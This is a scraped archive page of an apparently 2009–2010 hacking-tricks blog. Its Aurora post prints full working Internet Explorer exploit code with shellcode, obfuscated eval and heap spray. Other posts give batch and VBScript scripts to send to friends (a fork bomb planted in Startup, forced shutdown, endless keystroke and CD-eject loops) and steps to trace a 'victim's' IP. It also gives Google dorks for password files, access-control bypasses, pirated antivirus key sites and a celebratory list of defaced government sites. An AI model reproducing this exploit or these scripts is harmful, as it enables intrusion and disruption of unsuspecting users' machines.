xmlns:fb=’http://www.facebook.com/2008/fbml’ Ethical Security

search

Custom Search
Showing posts with label Hacking tricks. Show all posts
Showing posts with label Hacking tricks. Show all posts

Friday, October 1, 2010

How to Trace IP address from Gmail ,Yahoo ,Hotmail

If you deal with Computer Security and Penetration testing , you must be knowing the importance on IP address . To perform any kind of penetration testing or hacking you first need to know the IP address . Here I am going to discuss how to obtain IP address from Gmail , Yahoo and Hotmail .

Monday, August 23, 2010

Computer Hacking with CyberGATE

In this article I am going to discuss about a Remote Administrative tool CyberGate .CyberGate is a powerful, fully configurable and stable Remote Administration Tool .It was built to be a tool for various  possible applications, ranging from assisting Users with routine maintanence tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access. CyberGate achieves this though it's abundant array of features. A few of which are illustrated below .

Thursday, July 29, 2010

How to scan for open ports using netcat and superscan

Most of the times there is a need to know the open ports for the analysis of system security . A attacker can get into your system through the open ports . To fix it you need to know which ports are open , so than you can take the necessary steps . Here is how you can check those open ports using netcat , superscan and strobe applications .

Thursday, May 6, 2010

Facebook Exploit , view your friends’ live chats

A major security hole has been found in Facebook . This facebook exploit lets you view your friends live chats .This exploit is like a facebook hacking tricks .With this exploit you can also view your friends pending friends request . The video below demonstrate how to use this facebook exploit .

Friday, April 30, 2010

Don't scan these ip address ,you will be caught

There are certain IP address of  government and other organizations which should never be scanned . All activities on these IP s are monitored . If you scan these IP you will be caught and jailed  Here is the list of some of such IP address .

Friday, April 16, 2010

Books , which every beginner of hacking should read .

I have seen many guys running here and there to learn about hacking . I often get email from enthusiastic newbies asking  "how can I learn to be a  hacker? You cant learn to hack magically , just by reading some tuts and doing some funny stuff don't make you a hacker . To be a hacker you need to know how things works , then only you can know how hacking works . To be a hacker you need to get the basic  knowledge about internet and networks  , for that you have to read , now what to read ?  Here are some books that every newbie hacker should read , if you seriously wanna be a hacker .

Wednesday, March 24, 2010

By pas Rapidshare waiting time

This a hacking trick to by pass rapidshare waiting time . As  most of you know, Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address. By following these simple steps you can by pass rapidshare waiting time .



1. Goto the page you want to download. (the rapidshare address of your download)
2. Select FREE button
3. In the address bar put the following:

javascript:alert(c=0)
4. Click on the "go to" button
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
8. Enjoy! 

60 Proxy websites for staying anonymous online

This summary is not available. Please click here to view the post.

Tuesday, February 2, 2010

How Chinese used “Aurora” IE Exploit Against Google

Google and China were in news last week . Chinese hackers were reported to be involved for hacking in the Google network. In the coming lines we will be discussing how the attack was carried out on the Google network.

Attacker have used the invalid pointer reference vulnerability found in IE 6 , 7 and 8 .They exploited this vulnerability on IE6 .Recently Microsoft has issued an Advisory 979352: saying “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution". This IE vulnerability is called as Aurora .The video below demonstrates how crackers used this Aurora vulnerability with Metasploit to get into Google computers.

The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.




Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below is now released publicly .

var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}


Click here for more details

Wednesday, December 2, 2009

Get Unlimited Free Google Wave Invitations

This is how you can get unlimited free Google Wave Invitations .The mandatory requirement for this trick is that ,you have at least One Google Wave Account and atleast One Google Wave Invitation left to send other people.

Step 1 -Go to http://www.gmail.com and create a new account.
Step 2 -Login at http://www.googlewave.com
Step 3 -Click Invite Others to Google Wave and write your Gmail address at Enter an Email Address Box.



Step 4 -Login at http://www.gmail.com with Id that you created in Step 1 and click Inbox. Accept the Invitation and you will be redirected to your New Google Wave Account.
Step 5 -Now you can see 8 Invites in your new Google Wave Account. So just follow Step 3 everytime wen u want to Invite some one but use his emaill address in email address box and wen you have only 1 Invite left follow the whole procedure again.

Monday, November 23, 2009

4 ways to trace someone ip address

Here are the three best ways of tracing ip address . There can be many but I am putting here 3 only .


----------------------------------------

1. Obtaining an IP from MSN or Yahoo or any Messenger.


----------------------------------------

Firstly we learn the method used by most people when they want to get
someone else IP Address.

Step 1 - Start MSN Messenger and login as yourself.

Step 2 - Hit your "Start" button and click run. Type into the white box
"Command" or type cmd(without the quotation marks)

Step 3 - Type in "Netstat -N" (without the quotation marks) into the
black box and hit enter.

Step 4 - Start a conversation with your 'victim' and send them a file.
Once they accept the file Hit your "Start" button and click run. Type
into the white box "Command" (without the quotation marks) and Type in "Netstat -N"
(without the quotation marks) into the black box and hit enter.

Step 5 - Look in the middle column of both your MS Dos boxes and look
in the newer window for the IP address that has magically appeared in
the middle column. This is your victim's IP Address.









-----------------------------------

2. Obtaining an IP from an E-Mail.


-----------------------------------

Ok, lets say the person does not use MSN Messenger
we can still get his IP address from most E-Mail address. In this example we
shall use Outlook Express to view the E-Mails in.

Step 1 - Load Outlok express and left click on an E-Mail that was sent
from your 'victim'

Step 2 - Right click this E-Mail and click the "Properties" button.

Step 3 - Now Click on the tab displaying as it's text "Details" and
look for the buttom saying "Message Source", once found (not hard) click it.

Step 4 - Look in all the jargon for something like "X-Originating-IP: "
with a number after the colon. This number is the sender's IP Address.

Step 5 - If you cannot find "X-Originating-IP: " then do not worry.
Look for instead "Received:", and go along this string until you come
to a number in brackets, this however maybe an IP but it might not be
the IP address of the 'victim', infact if they sent the E-Mail from a
E-Mail service (like hotmail.com) then chances are it is not their
IP address.








---------------------------------------

3. Obtaining an IP from Physical Access.


---------------------------------------

If you have physical access to a computer then getting the IP address
is simple.

Step 1 - Click the "Start" button and hit "Run". Type in "Command" and
hit enter.

Step 2 - Type in "ipconfig" OR "winipcfg" and hit enter now look for
where it says "IP Address:", next to this is the IP of the computer you
are using

The forth method is posted in video section ,Check there

Wednesday, November 18, 2009

How to stay anonymous online !

You may be knowing that you leave your footprints everywhere you go online. Your every activity is recorded in the logs of the servers you visit and correlated to your IP address, which gives the admins everything they need in order to find your location. Check this link for a live example:
http://whatismyipaddress.com/
No one likes to be traced. This tutorial will show you how to securely hide your IP address using proxy online.

What are Proxies? You can’t change your IP address and expect to still be able to receive communication from the server you’re contacting. Why’s ? Because the server will just send its response to the computer it thinks sent the packet, which means you would not receive any response but the computer with the address you spoofed would receive information it didn’t ask for. but it’s not very helpful to us when we want to be able to receive information from a server without giving
away our true identity. This is where proxies come in. A proxy is a sort of middle man When you use a proxy, all your browser’s traffic is sent not to the target server, but to the proxy server, which then relays your traffic to the target. The target in turn responds to the proxy server, which relays the traffic back to you.


What is TOR?


TOR is in effect a very well organized chain proxy . It routs your traffic through different paths every ten minutes and randomly chooses the proxies you’ll use on each hop to give you very strong anonymity. See here for more details: http://www.torproject.org/overview.html.en Whenever you’re doing something sensitive or private online, TOR is your best option. However, there is one downside: depending on the proxies that are incorporated into your proxy chain, it can be very slow. This can usually be resolved by disconnecting from the TOR network and reconnecting. How to Install It On debian-based linux like ubuntu or backtrack, this is a breeze. Simply open up a terminal and
type in: [code]
sudo apt-get install tor
[/code]

On windows, first download the tor client here: http://www.torproject.org/easy-
download.html.en and run the installer. Choose full installation if you’re asked. Make sure you have Firefox closed. Configuring Firefox for TOR
There used to be a lot of manual configuration involved with setting up firefox to go through tor (manually changing proxy settings when you wanted to use it), but now there’s a handy firefox plugin called “Tor Button” that lets you toggle back and forth just by a single mouse click. It comes preinstalled with the windows installer. On Linux, you can install it here:
https://addons.mozilla.org/en-US/firefox/addon/2275
And that’s it! You can now head back over to http://whatismyipaddress.com or
http://cmyip.com and see where the server thinks you’re coming from.

Thursday, November 12, 2009

Awesome Gifts For Pakistan By Indians

Pakistani hackers hacked 50 Indian govt sites... Indian hackers replied.. by hacking 100 of them... have a look.


]http://www.mfa.gov.pk/indian_hackers.htm[
]http://www.agp.gov.pk/indian_hackers.htm[
]http://www.alp.gov.pk/indian_hackers.htm[
]http://www.cii.gov.pk/indian_hackers.htm[
]http://www.cmsindh.gov.pk/indian_hackers.htm[
]http://www.cmtl.gov.pk/indian_hackers.htm[
]http://www.eadtraining.gov.pk/indian_hackers.htm[
]http://www.enercon.gov.pk/indian_hackers.htm[
]http://www.environment.gov.pk/indian_hackers.htm[
]http://www.fab.gov.pk/indian_hackers.htm[
]http://www.fgehf.gov.pk/indian_hackers.htm[
]http://www.fsa.gov.pk/indian_hackers.htm[
]http://www.gefpak.gov.pk/indian_hackers.htm[
]http://www.heritage.gov.pk/indian_hackers.htm[
]http://www.lmis.gov.pk/indian_hackers.htm[
]http://www.met.gov.pk/indian_hackers.htm[
]http://www.tourism.gov.pk/indian_hackers.htm[
]http://www.commerce.gov.pk/indian_hackers.htm[
]http://www.sindhpolice.gov.pk/indian_hackers.htm[
]http://www.topians.edu.pk/indian_hackers.htm[
]http://www.usc.com.pk/indian_hackers.htm[
]http://www.topians.edu.pk/indian_hackers.htm[
]http://www.sindh.gov.pk/indian_hackers.htm[
]http://www.pwd.gov.pk/indian_hackers.htm[
]http://www.pmnh.gov.pk/indian_hackers.htm[

]http://www.pmad.gov.pk/indian_hackers.htm[
]http://www.pifra.gov.pk/indian_hackers.htm[
]http://www.pha.gov.pk/indian_hackers.htm[
]http://www.pcsir.gov.pk/indian_hackers.htm[
]http://www.pcrwr.gov.pk/indian_hackers.htm[
]http://www.pcret.gov.pk/indian_hackers.htm[
]http://www.pcb.gov.pk/indian_hackers.htm[
]http://rajpootmedical.com/[
]http://www.agp.gov.pk/index.html[
]http://mrbelt.com/[
]http://rdi.org.pk/[
]http://www.arduousgroup.com/[
]http://050telecom.com/[
]http://www.win.org.pk/[
]http://www.dailynewsmart.com.pk/[
]http://www.unapakistan.org.pk/[
]http://mobilezone.com.pk/admin/[
]http://accurateboxing.com/[
]http://www.rustam.com.pk/[
]http://www.tecno.com.pk/[
]http://www.salim-group.com/[
]http://www.pakstarsports.com[/
]http://test.sellpropertypk.com/[
]http://www.motivexonline.com/[
]http://www.sundoosaddlery.com/[
]http://www.menzee.biz/[
]http://www.jashanwalk.com/[


Some of the servers have been down by the gov. but many of them still on ... to check.... just try to see from last.....
I saw this post on orkut.... so... i m just spreading the message..... Vande Mataram... and nice work by ICW

Keys for NOD32 & Smart Security

Here is the list of sites the provide free Keys for NOD32 & Smart Security anti-virus

http://www.nod321.com/
http://www.nod32keys.com/
http://www.nod32sky.com/
http://www.for-ever.cn/nod32/
http://nod32logins.blogspot.com/
http://www.nod321.cn/

Thursday, June 25, 2009

Access a Website That Allows Google But Not You

when you conduct a search on Google and the search engine returns a number of good results, but when you try to open the ones that looks the most interesting you get a registration page. The reason is that there are some websites that allow Google but not unregistered or you. The solution is to disguise yourself as Google changing your browser's identity (named user agent) to Googlebot.

Internet Explorer

Copy this code into notepad and save it as a .reg file (name it googlebot-useragent.reg for example)

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Now double-click the .reg file you've created to merge it into Windows registry. In order to restore the default user agent copy this code into notepad and save it as a .reg file (name it standard-useragent.reg for example)


Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Now double-click the .reg file you've created (or downloaded) in order to change back to the default user agent.


Firefox

Type in about:config in the address bar and down to find "general.useragent.extra.firefox".
Double click on it and type in "Googlebot 2.1".
This will change Firefox user agent to the google bot. To change the user agent back to the original click Reset to restore the property to its default value.

Opera ,Safari

There is no way to change the user agent to Googlebot in Opera and safari

Friday, June 19, 2009

Get most out of Google

Google Search Options

Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Google allows you to search for specific file types, so instead of getting html-files as a result (websites) you get Microsoft excel files for example. The search string you would use would be this:

Filetype:xls (for excel files) or filetype:doc for word files.
But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way doesn’t tell you, you can search for *.db and *mdb files. I wonder what other file types one can search for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of something that might get you some interesting results.

Inurl

Another useful search option is the inurl: option which allows one to search for a certain word one would want to be in the url. This gives you the opportunity to search for specific directories/folders, especially in combination with the “index of” option. An example would be inurl:master-tricks which would give you results of website urls that have the word “master-tricks” in the url.

Index of

The index of option is another option that isn’t especially thought of by the creators of google, but comes in very handy. If you use the “index of” string you will find directory listings of specific folders on servers. An example could be: "index of” master-tricks or index.of.master-tricks which would get you many directory listings of master-tricks folders. (don’t forget to use the quotes in this case since you are looking for the entire “index of” string, not just for “index” and “of”)

Site

The site option allows you to come up with results that only belong to a certain domain name extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites, but also for results from just one site. An example of a search string would be: Site:org

Intitle

Intitle is another nice option. It allows you to search for html files that have a certain word or words in the title. The format would be intitle:wordhere.

Link

The Link option allows you to check which sites link to a specific site. For example link:http://pratikthorve.blogspot.com

Combining search options

The above mentioned search options might or might not be known to you, but even though they can amount to some interesting results, it’s a fact that when you start combining them, that’s when google’s magic starts to show. For example, one could try this search string: inurl:master-tricks intitle:master-tricks or this one: site:org filetype:xls "password" .

Try this fork bomb

This is a small code , which will make a command run over and over until the computer cannot handle any more programs and the computer will freeze or shutdown.
!!!!THIS IS HARMLESS AND WILL DO NO DAMAGE TO YOUR COMPUTER!!!!!

To make this open note pad and type:

@echo off
:START
start a.bat
GOTO START

The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.
You can try this on your friends by putting it in the Startup.

Thursday, May 7, 2009

Some fun hacks with vbscript and batch files

Cycle a message in your friends computer

open your notepad and type the following lines of code

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

save it as anyfilename.bat
run and see the magic



Convey message to your friend and shutdown his/her computer


open your notepad and type the following lines of code

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" and send it.


Toggle your friend's Caps Lock button simultaneously


open your notepad and type the following lines of code

Set wshShell =wscript.CreateObje ct("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.


Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!



open your notepad and type the following lines of code

Set oWMP = CreateObject("WMPlayer.OCX. 7")
Set colCDROMs = oWMP.cdromCollectio n
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.


Frustrate your friend by making this VBScript hit Enter simultaneously

open your notepad and type the following lines of code

Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.

Sunday, April 19, 2009

8 hacks to make Firefox amazingly fast

Double your browser's speed in just five minutes

For about five minutes work and for the cost of precisely nothing at all. Here's what you need to do to make your Firefox extreamly fast.

1. Enable pipelining

Browsers normally sends a request to a server then wait for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.

2. Render quickly

Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.

3. Faster loading

If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.

4. No interruptions

You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.

5. Block Flash

Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.

6. Increase the cache size

As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.

7. Enable TraceMonkey

TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.

Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.

8. Compress data

If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance.

20 registry hacks to make your PC more awesome as never before

Exploring the lesser-known Control Panel applets is another useful technique, and browsing the command line applications in Windows' System32 folder can be interesting. But let's be realistic. There's nothing that quite compares to the Registry.
It's packed with useful settings that can improve performance, fix security holes and change even the most fundamental Windows behaviour for the better. And many of these features simply can't be accessed in any other way. Be careful, though: the Registry has more than its fair share of traps.

If you're not cautious, you could cause more problems than you solve. But with a little care you can get on with creating a better system that's tailored towards your needs.Here are some great registry hacks

1. Improve security

If strangers have physical access to your PC, it's easy for them to plug in a USB flash drive and make copies of your data. If you're using Windows XP SP2 or later, though, there's a simple way to prevent this from happening.

Go to 'HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies', create a DWORD value called 'WriteProtect' and set it to 1. You'll be able to read USB drives, but not write to them any more.

2. Tame UAC

Windows Vista's User Account Control raises so many alerts that many people just turn it off. But do that and you'll also lose useful features like IE's protected mode. If you really can't live with UAC, try disabling the alerts for administrators: you won't get any more hassle, but UAC will run in the background and you'll still get its other features.

To do this, set 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin' to 0. You can restore normal UAC behaviour by setting it to 2.

3. Change the owner

Install Windows on your PC and you'll be asked to enter your name, which is then stored as the registered owner (run WinVer to see this on your system). If you've got a second-hand PC, you probably want to change the name stored as the registered owner. There's no obvious way to do this, and that's where the Registry comes in.

Browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion' and you'll see both a 'RegisteredOwner' and 'RegisteredOrganization' value. Double-click either to change them.

4. Sort files properly

Sorting filenames in Explorer can be a problem. By default, it will place 'File_v2.txt' before 'File_v15. txt': that's not ASCII ordering, but it seems to be sensible. But what if the 'v' refers to a version number, and actually File_v15.txt should come first? Suddenly Explorer's default system doesn't work at all.

To restore regular ASCII file ordering, go to 'HKLM\Software\Microsoft\Windows\Currentversion\Policies\Explorer', create a DWORD value called 'NoStrCmpLogical' and set it to 1. Delete the key to restore the standard Explorer approach.

5. Troubleshoot startup

If Windows is taking its time to start up or shut down, there might be a problem. To find out what's going on, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', create a DWORD value called 'verbosestatus' and set it to 1. Restart your PC and Windows will tell you what it's getting up to.

6. Manage folder types

Windows Vista's Explorer will 'intelligently' choose your folder type based on its contents. But this means that a Download folder will change to a Music folder if you grab a few MP3s. To fix this, go to 'HCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell', delete the 'Bags' subkey and then create a new Bags key in the same location.

Create a key called 'AllFolders' beneath Bags, and a key called 'Shell' below that. Click it to open 'HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\ Bags\AllFolders\Shell'. Right-click the right-hand pane, choose 'New | String Value' and call this 'FolderType'. Then double-click FolderType and set its value to 'NotSpecified'. You'll still be able to change the folder type, but Vista will no longer assign one. (See steps 10 to 20 here if you need more help.)

7. Easy encryption

